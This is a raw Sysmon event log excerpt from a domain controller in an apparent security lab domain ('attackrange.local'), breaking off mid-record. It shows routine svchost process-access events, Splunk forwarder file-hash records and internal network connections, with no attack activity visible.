12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011488Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011487Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011486Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011485Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011484Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011483Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.371{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:50.074{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20175A86E19D73DA6F25BAE84506DEFB,SHA256=1D925A409074793BAAA35AAC7E28FFA20E99FD813B3976900046FA90D3ECC28E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011494Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:51.089{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CAB47D57A61F3CA06AA5307A9D13C03,SHA256=1F1899ED71738C63F0B6290FB379C9F082631828BC9ED9CD27AFBE38661F87C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011495Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:52.105{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6955668D1CAE45B45F30C3D7136FF38B,SHA256=235A484873FE5C52AD191E525CA8DD0873E6C4A46C0FB956013C8A861754C8DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011496Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:53.105{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA1AFB410DE71F369498DE4DEF6BDC99,SHA256=E3647DE373318289F14365B5556566DA303801B2EB50FF64C8C6B758929C6EFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011499Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:54.323{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=144752BC0472DACA8D8774E8A17E7BEB,SHA256=43CE44012AC45F18C9587E3A6B7D7A220544259573A5567E691E87DD259560E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011498Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:54.323{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95A80D9B4AD5949BF29894BF1C5657A7,SHA256=6AE46E6F65A933E9209809BD89B61087CB1E629AB56C694701B50FB6E0D79817,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011497Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:54.120{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57B0681D11828E7B7BA7D9682DC15BDF,SHA256=A69312ACAC217586633869E1C34B2C442F2D22760F0BFED5FB2562A76E210965,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011501Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:54.490{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53731-false10.0.1.12-8000- 23542300x800000000000000011500Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:55.167{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=205A6B9EF313065F6740452A3A571336,SHA256=4011FE520E49FD0D5A2C84120E5172E086C2EDCC1F0C181C4ECB03CE5864D195,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011502Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:56.183{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6A12AD718701CB18E0A4076661FE515,SHA256=9756CCD2DC2F53BC6D07B8890A56F1C079E5F46F6D01F76C17DAB37744781479,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011503Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:57.214{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DB23FFDABCE60A5D791DAE32221A091,SHA256=2ECCDCCFDE533DA382FFDEB15D2E06684565196EE0610321CB3D3D7211E7F377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011504Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:58.229{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11786518BC0D16BC096559AE060A5504,SHA256=B810D02CB63CF3C9D8FFAF9A3490036558960307A04776978446B5402ECB6711,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011505Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:59.260{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA90AC9D5E3227647E5F2BA1BF8E1512,SHA256=B38F8BCE737E6BA2060DD813776C9929FBE7334B32EBDAA2A9B6AE8E11E6FC13,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000011507Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:59.631{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53732-false10.0.1.12-8000- 23542300x800000000000000011506Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:00.276{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD9656B8D9765D8E4ED60B38297C73CF,SHA256=FCE5E3E46642104E9BD625B548200F6FBE32F882E1A72EF9E52B8070BBFEAC1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011510Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:01.698{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=610556D7583360293BFB7EA02FBC059D,SHA256=FDD182C0EBC2CD7A017B5C2471FBD9E130124292855D7B75ABA4B3857BC02206,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011509Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:01.698{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7DE3728E21641F89EAFB923C98EB3539,SHA256=805A7A961033418664F340EC510915F35C4B9F59DBB34056E803E62D8758C5FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011508Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:01.323{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=717C61A53DBA16FEB87FA6CE93BC119B,SHA256=A154DB14BAB9B287988B10A599F4BB4D5F6450B5065C2585069F8C8378F69694,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011519Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:11:02.854{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-66D6-6064-8201-00000000AE01}4264C:\Program 